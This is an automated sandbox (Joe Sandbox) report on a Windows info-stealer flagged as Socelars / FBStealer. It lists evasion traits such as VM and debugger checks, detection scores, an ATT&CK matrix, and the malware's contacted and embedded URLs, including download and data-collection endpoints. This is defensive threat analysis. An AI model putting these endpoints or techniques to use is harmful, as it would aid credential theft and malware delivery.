Source: C:\Users\user\Desktop\8A3kk3sc5r.exe	Mutant created: \Sessions\1\BaseNamedObjects\patatoes

Source: C:\Users\user\Desktop\8A3kk3sc5r.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\8A3kk3sc5r.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: 8A3kk3sc5r.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: 8A3kk3sc5r.exe

Static file information: File size 1501184 > 1048576

Source: 8A3kk3sc5r.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x113a00

Source: 8A3kk3sc5r.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 8A3kk3sc5r.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 8A3kk3sc5r.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 8A3kk3sc5r.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 8A3kk3sc5r.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 8A3kk3sc5r.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 8A3kk3sc5r.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: 8A3kk3sc5r.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: 8A3kk3sc5r.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 8A3kk3sc5r.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 8A3kk3sc5r.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 8A3kk3sc5r.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 8A3kk3sc5r.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: 8A3kk3sc5r.exe	Static PE information: section name: .bdkkxia
Source: 8A3kk3sc5r.exe	Static PE information: section name: .bdkkxia

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\8A3kk3sc5r.exe

API coverage: 3.2 %

Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: 8A3kk3sc5r.exe, 00000001.00000002.323821044.00000000011DA000.00000004.00000020.00020000.00000000.sdmp, 8A3kk3sc5r.exe, 00000001.00000000.305710248.00000000011DA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`p#
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: VMware7,1
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: 8A3kk3sc5r.exe, 00000001.00000002.323869436.0000000001236000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.me
Source: Amcache.hve.6.dr	Binary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

Source: C:\Users\user\Desktop\8A3kk3sc5r.exe

Code function: 1_2_00E7CD56 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

1_2_00E7CD56

Source: C:\Users\user\Desktop\8A3kk3sc5r.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\8A3kk3sc5r.exe	Code function: 1_2_00E89887 mov eax, dword ptr fs:[00000030h]		1_2_00E89887
Source: C:\Users\user\Desktop\8A3kk3sc5r.exe	Code function: 1_2_00E939AB mov eax, dword ptr fs:[00000030h]		1_2_00E939AB

Source: C:\Users\user\Desktop\8A3kk3sc5r.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\8A3kk3sc5r.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\8A3kk3sc5r.exe	Code function: 1_2_00E76432 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		1_2_00E76432
Source: C:\Users\user\Desktop\8A3kk3sc5r.exe	Code function: 1_2_00E7CD56 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		1_2_00E7CD56

Source: C:\Users\user\Desktop\8A3kk3sc5r.exe

Code function: 1_2_00E94134 _free,GetTimeZoneInformation,_free,

1_2_00E94134

Source: Amcache.hve.6.dr, Amcache.hve.LOG1.6.dr	Binary or memory string: c:\users\user\desktop\procexp.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.dr, Amcache.hve.LOG1.6.dr	Binary or memory string: procexp.exe

Stealing of Sensitive Information

Yara detected Socelars

Source: Yara match	File source: 8A3kk3sc5r.exe, type: SAMPLE
Source: Yara match	File source: 1.0.8A3kk3sc5r.exe.d90000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.8A3kk3sc5r.exe.d90000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.8A3kk3sc5r.exe.d90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.8A3kk3sc5r.exe.d90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000000.306336689.0000000000EAB000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.297416868.0000000000EAB000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.305596513.0000000000EAB000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 8A3kk3sc5r.exe PID: 4360, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	1 LSASS Driver	1 Process Injection	1 Virtualization/Sandbox Evasion	1 Input Capture	1 System Time Discovery	Remote Services	1 Input Capture	Exfiltration Over Other Network Medium	11 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 LSASS Driver	1 Process Injection	LSASS Memory	31 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Obfuscated Files or Information	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	113 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	1 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
8A3kk3sc5r.exe	64%	Virustotal		Browse
8A3kk3sc5r.exe	74%	ReversingLabs	Win32.Trojan.FBStealer
8A3kk3sc5r.exe	100%	Avira	HEUR/AGEN.1209209
8A3kk3sc5r.exe	100%	Avira	JS/SpyBanker.G2
8A3kk3sc5r.exe	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Download
1.0.8A3kk3sc5r.exe.d90000.2.unpack	100%	Avira	HEUR/AGEN.1209209	Download File
1.0.8A3kk3sc5r.exe.d90000.2.unpack	100%	Avira	JS/SpyBanker.G2	Download File
1.0.8A3kk3sc5r.exe.d90000.1.unpack	100%	Avira	HEUR/AGEN.1209209	Download File
1.0.8A3kk3sc5r.exe.d90000.1.unpack	100%	Avira	JS/SpyBanker.G2	Download File
1.0.8A3kk3sc5r.exe.d90000.0.unpack	100%	Avira	HEUR/AGEN.1209209	Download File
1.0.8A3kk3sc5r.exe.d90000.0.unpack	100%	Avira	JS/SpyBanker.G2	Download File
1.2.8A3kk3sc5r.exe.d90000.0.unpack	100%	Avira	HEUR/AGEN.1209209	Download File
1.2.8A3kk3sc5r.exe.d90000.0.unpack	100%	Avira	JS/SpyBanker.G2	Download File

Domains

Source	Detection	Scanner	Label	Link
www.listincode.com	8%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.channelinfo.pw/index.php/Home/Index/getExe	0%	URL Reputation	safe
http://ngdatas.pw/https://www.listincode.com/0.0.0.0%d.%d.%d.%dhttp-1ZIP	0%	URL Reputation	safe
http://www.tpyyf.com	2%	Virustotal		Browse
http://www.tpyyf.com	100%	Avira URL Cloud	malware
https://www.listincode.com/i	100%	Avira URL Cloud	malware
https://www.listincode.com/	0%	URL Reputation	safe
http://www.channelinfo.pw/index.php/Home/Index/getExeidnameexe_urlexe_namerun_valuecountry_codeaband	0%	URL Reputation	safe
http://www.tpyyf.com/Home/Index/getdata	3%	Virustotal		Browse
http://www.tpyyf.com/Home/Index/getdata	100%	Avira URL Cloud	malware
http://ngdatas.pw/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
iplogger.org	148.251.234.83	true	false		high
www.listincode.com	149.28.253.196	true	true	8%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://iplogger.org/1GWfv7	false		high
https://www.listincode.com/	true	URL Reputation: safe	unknown
http://ngdatas.pw/	true	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://iplogger.org/1KyTy7	8A3kk3sc5r.exe	false		high
https://iplogger.org/14Qju7	8A3kk3sc5r.exe	false		high
https://iplogger.org/1Gjzj7	8A3kk3sc5r.exe	false		high
https://iplogger.org/1756b7	8A3kk3sc5r.exe	false		high
https://iplogger.org/Hl	8A3kk3sc5r.exe, 00000001.00000000.305760385.0000000001248000.00000004.00000020.00020000.00000000.sdmp, 8A3kk3sc5r.exe, 00000001.00000003.302100919.0000000001248000.00000004.00000020.00020000.00000000.sdmp	false		high
https://iplogger.org/12QMs7	8A3kk3sc5r.exe	false		high
https://sm.ms/api/v2/upload?inajax=1https://sm.ms/api/v2/upload?inajax=1	8A3kk3sc5r.exe	false		high
https://iplogger.org/1Gbzj7	8A3kk3sc5r.exe	false		high
https://iplogger.org/1TBch7	8A3kk3sc5r.exe	false		high
https://iplogger.org/1Cr3a7	8A3kk3sc5r.exe	false		high
https://iplogger.org/1spuy7	8A3kk3sc5r.exe	false		high
https://iplogger.org/1UKG97	8A3kk3sc5r.exe	false		high
http://www.channelinfo.pw/index.php/Home/Index/getExe	8A3kk3sc5r.exe	false	URL Reputation: safe	unknown
https://iplogger.org/	8A3kk3sc5r.exe, 00000001.00000003.302100919.0000000001248000.00000004.00000020.00020000.00000000.sdmp	false		high
https://iplogger.org/1fHtp7	8A3kk3sc5r.exe	false		high
https://iplogger.org/1XJq97	8A3kk3sc5r.exe	false		high
https://iplogger.org/1BBCf7	8A3kk3sc5r.exe	false		high
http://ngdatas.pw/https://www.listincode.com/0.0.0.0%d.%d.%d.%dhttp-1ZIP	8A3kk3sc5r.exe	true	URL Reputation: safe	unknown
http://www.tpyyf.com	8A3kk3sc5r.exe	true	2%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://iplogger.org/143up7	8A3kk3sc5r.exe	false		high
https://iplogger.org/1DE477	8A3kk3sc5r.exe	false		high
https://iplogger.org/1Tkij7	8A3kk3sc5r.exe	false		high
https://iplogger.org/1GWfv7.t	8A3kk3sc5r.exe, 00000001.00000003.302100919.0000000001248000.00000004.00000020.00020000.00000000.sdmp	false		high
https://iplogger.org/1T79i7	8A3kk3sc5r.exe	false		high
https://www.google.com	8A3kk3sc5r.exe	false		high
https://iplogger.org/1pcji7	8A3kk3sc5r.exe	false		high
https://iplogger.org/1s5qp7	8A3kk3sc5r.exe	false		high
https://iplogger.org/12TMs7	8A3kk3sc5r.exe	false		high
https://iplogger.org/1Uts87	8A3kk3sc5r.exe	false		high
https://www.listincode.com/i	8A3kk3sc5r.exe, 00000001.00000002.323821044.00000000011DA000.00000004.00000020.00020000.00000000.sdmp, 8A3kk3sc5r.exe, 00000001.00000000.305710248.00000000011DA000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://iplogger.org/1TCch7	8A3kk3sc5r.exe	false		high
https://iplogger.org/1G7Sc7	8A3kk3sc5r.exe	false		high
https://iplogger.org/1OhAG	8A3kk3sc5r.exe	false		high
https://iplogger.org/1b4887	8A3kk3sc5r.exe	false		high
https://iplogger.org/1pdxr7	8A3kk3sc5r.exe	false		high
https://iplogger.org/1rqRg7	8A3kk3sc5r.exe	false		high
https://iplogger.org/1aaVp7	8A3kk3sc5r.exe	false		high
https://iplogger.org/1H3Fa7	8A3kk3sc5r.exe	false		high
https://iplogger.org/1OZVH	8A3kk3sc5r.exe	false		high
https://iplogger.org/1UpU57	8A3kk3sc5r.exe	false		high
https://iplogger.org/1rd8N6	8A3kk3sc5r.exe	false		high
https://iplogger.org/1O2BH	8A3kk3sc5r.exe	false		high
https://iplogger.org/1Pdet7	8A3kk3sc5r.exe	false		high
http://www.channelinfo.pw/index.php/Home/Index/getExeidnameexe_urlexe_namerun_valuecountry_codeaband	8A3kk3sc5r.exe	false	URL Reputation: safe	unknown
https://iplogger.org/1x5bg7	8A3kk3sc5r.exe	false		high
https://iplogger.org/1XKq97	8A3kk3sc5r.exe	false		high
https://iplogger.org/1GWfv7Ft	8A3kk3sc5r.exe, 00000001.00000000.305760385.0000000001248000.00000004.00000020.00020000.00000000.sdmp, 8A3kk3sc5r.exe, 00000001.00000003.302100919.0000000001248000.00000004.00000020.00020000.00000000.sdmp	false		high
https://iplogger.org/1XSq97	8A3kk3sc5r.exe	false		high
https://iplogger.org/1746b7	8A3kk3sc5r.exe	false		high
https://iplogger.org/19iM77	8A3kk3sc5r.exe	false		high
https://iplogger.org/169Bx7	8A3kk3sc5r.exe	false		high
https://iplogger.org/1T89i7	8A3kk3sc5r.exe	false		high
https://iplogger.org/1rDMq785https://iplogger.org/1rd8N686https://iplogger.org/1spuy788https://iplog	8A3kk3sc5r.exe	false		high
https://iplogger.org/1s4qp7	8A3kk3sc5r.exe	false		high
https://iplogger.org/1uS4i7	8A3kk3sc5r.exe	false		high
https://iplogger.org/1uW6i7	8A3kk3sc5r.exe	false		high
https://iplogger.org/16ajh7	8A3kk3sc5r.exe	false		high
https://iplogger.org/14ePy7	8A3kk3sc5r.exe	false		high
https://iplogger.org/16xjh7	8A3kk3sc5r.exe	false		high
https://iplogger.org/1wnqn7	8A3kk3sc5r.exe	false		high
https://iplogger.org/1X8M97	8A3kk3sc5r.exe	false		high
https://www.amazon.com/	8A3kk3sc5r.exe	false		high
https://iplogger.org/1Ghzj7	8A3kk3sc5r.exe	false		high
https://iplogger.org/1rDMq7	8A3kk3sc5r.exe	false		high
http://www.tpyyf.com/Home/Index/getdata	8A3kk3sc5r.exe	true	3%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://upx.sf.net	Amcache.hve.6.dr	false		high
https://iplogger.org/1lcZz	8A3kk3sc5r.exe	false		high
https://iplogger.org/1TW3i7	8A3kk3sc5r.exe	false		high
https://iplogger.org/1Z7qd7	8A3kk3sc5r.exe	false		high
https://iplogger.org/1q6Jt7	8A3kk3sc5r.exe	false		high
https://iplogger.org/1mxKf7	8A3kk3sc5r.exe	false		high
https://iplogger.org/1CUGu7	8A3kk3sc5r.exe	false		high
https://iplogger.org/1OXFG	8A3kk3sc5r.exe	false		high
https://iplogger.org/1bV787	8A3kk3sc5r.exe	false		high
https://prntscr.com/upload.php	8A3kk3sc5r.exe	false		high
https://sm.ms/api/v2/upload?inajax=1	8A3kk3sc5r.exe	false		high
https://www.google.com/search?q=admob&oq=admob	8A3kk3sc5r.exe	false		high
https://iplogger.org/14Jup7	8A3kk3sc5r.exe	false		high
https://iplogger.org/1SWks7	8A3kk3sc5r.exe	false		high
https://iplogger.org/1TXch7	8A3kk3sc5r.exe	false		high
https://iplogger.org/1GWfv7Ur	8A3kk3sc5r.exe, 00000001.00000000.305760385.0000000001248000.00000004.00000020.00020000.00000000.sdmp, 8A3kk3sc5r.exe, 00000001.00000003.302100919.0000000001248000.00000004.00000020.00020000.00000000.sdmp	false		high
https://iplogger.org/1Gczj7	8A3kk3sc5r.exe	false		high
https://iplogger.org/1Sxzs7	8A3kk3sc5r.exe	false		high
https://iplogger.org/1GiLz7	8A3kk3sc5r.exe	false		high
https://prntscr.com/upload.phphttps://prntscr.com/upload.php	8A3kk3sc5r.exe	false		high
https://iplogger.org/1GaLz7	8A3kk3sc5r.exe	false		high
https://iplogger.org/1Smzs7	8A3kk3sc5r.exe	false		high
https://www.aol.com	8A3kk3sc5r.exe	false		high
https://iplogger.org/1CDGu7	8A3kk3sc5r.exe	false		high
https://iplogger.org/1yXwr7	8A3kk3sc5r.exe	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
148.251.234.83	iplogger.org	Germany		24940	HETZNER-ASDE	false
149.28.253.196	www.listincode.com	United States		20473	AS-CHOOPAUS	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	567602
Start date:	07.02.2022
Start time:	13:25:47
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 9s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	8A3kk3sc5r.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.winEXE@2/6@2/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 3.6% (good quality ratio 3.5%) Quality average: 75.3% Quality standard deviation: 23.1%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.21
Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, arc.msn.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:26:58	API Interceptor	1x Sleep call for process: WerFault.exe modified

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_8A3kk3sc5r.exe_96d850779c25a1697eb7a6e5793779f04428b93e_e51a470d_19e8227b\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0249882522682112
Encrypted:	false
SSDEEP:	192:GUbo9XuJfHBUZMX3KPjmH6v8/u7sfS274ItI1J:64BUZMXgj18/u7sfX4ItE
MD5:	B308AE04766D14E75F23BFB124C2F370
SHA1:	DECEA48B2DD17416D2FB90FA3C0B66C19ED23407
SHA-256:	892A90FAE3562006F5DA1E85CFC7D8DC34263AEE80702D35A44A0E712E05320A
SHA-512:	658BBC3098EF39F192C1DCBC0EC7FA093F92062FE757ADE414994DEE05832DD8C14193A507AF08AFD162B0D6D9FC38A10473E6DC9D66258B182198DF127FB542
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.8.7.4.2.8.1.3.4.6.3.8.8.9.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.8.7.4.2.8.1.7.7.6.0.7.4.9.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.6.8.9.5.8.f.8.-.7.d.5.6.-.4.0.4.a.-.8.8.a.f.-.e.3.d.c.b.b.e.9.6.6.4.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.9.0.1.d.8.f.3.-.3.0.a.c.-.4.0.d.7.-.a.1.d.e.-.a.f.5.a.3.d.6.0.6.f.d.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.8.A.3.k.k.3.s.c.5.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.1.0.8.-.0.0.0.1.-.0.0.1.c.-.c.2.9.9.-.2.3.6.9.6.9.1.c.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.b.4.6.9.c.f.5.b.8.0.7.7.5.e.0.5.e.b.9.e.c.f.5.b.0.c.a.7.4.4.5.0.0.0.0.0.9.0.4.!.0.0.0.0.a.b.f.8.7.0.b.3.c.7.b.f.a.f.f.9.a.0.a.1.b.e.c.1.f.d.a.b.b.9.3.8.5.3.6.9.6.1.1.4.!.8.A.3.k.k.3.s.c.5.r...e.x.e.....T.a.r.g.e.t.A.p.p.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1405.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8298
Entropy (8bit):	3.6961205798819945
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNijKw65c6YFQSU1TgmfBlkS1CprF89bCpsf5Wm:RrlsNi56C6YySU1Tgmf4S/CCfh
MD5:	6CA2379C5C0076577961ADEFE8C9EB1F
SHA1:	4245E2D6BB2F91A9A90E83BF45CCB97F9D83F783
SHA-256:	160F854E0D0C4CF543B85EDE74016A906731DE7C17A72C5255250210A2D30906
SHA-512:	48ECF677A977971C9728D9489203EC72848133AE6EA29ACD8F0238366F90F9C964470AF8C61A47E61A005238982B4B1561FFEE601464DA753064EB1764B3F9A2
Malicious:	false
Reputation:	low
